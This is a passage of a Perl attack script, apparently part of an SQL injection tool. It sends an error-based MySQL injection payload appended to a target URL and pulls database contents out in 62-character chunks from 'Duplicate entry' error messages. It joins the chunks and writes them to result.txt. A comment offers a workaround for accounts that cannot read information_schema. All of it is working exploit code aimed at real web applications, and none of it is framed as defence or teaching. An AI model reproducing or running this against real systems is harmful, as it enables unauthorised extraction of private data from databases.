    for($i=1;$i<8000;$i=$i+62)
    {
        # (author) when the account cannot read information_schema, another known table has to stand in for the FROM target
        #$xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group by a)b)";
        $xsql = "and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((Select ($loadx)),$i,62)))a+from+information_schema.tables+group+by+a)b)";
        $final=$target.'+'.$xsql.$comstr;
        print $final."\n";
        $res=$ua2->get($final);
        #print $res->content;
        if ($res->content =~/Duplicate entry \'1\' for key /)   # empty chunk: nothing left to read
        {
            print "[+] got data finished!\n";
            last;
        }
        # greedy, /s so the capture may span newlines; $& is the full matched text
        if ($res->content =~ /Duplicate entry \'1([\s\S]*)\' for key /s)
        {
            $content = $&;
            $content =~ s/Duplicate entry \'1//g;
            #$content =~ s/\' for key //;
            if(length($content)<1)
            {
                print "[+] got data finished!\n";
                last;

            }
            # keep only the text before the first "' for key "
            $position = index($content,"\' for key ");
            $content = substr($content,0,$position);

            $result .= $content;
            print "[+] content : \n$result\n\n";
        }else
        {
            print "[-]can not got data!\n";
            last;
        }
    }
    print "[+] result : \n$result\n\n";
    open(FH,">>result.txt");
    print FH ("$result\n\n");
    close(FH);
}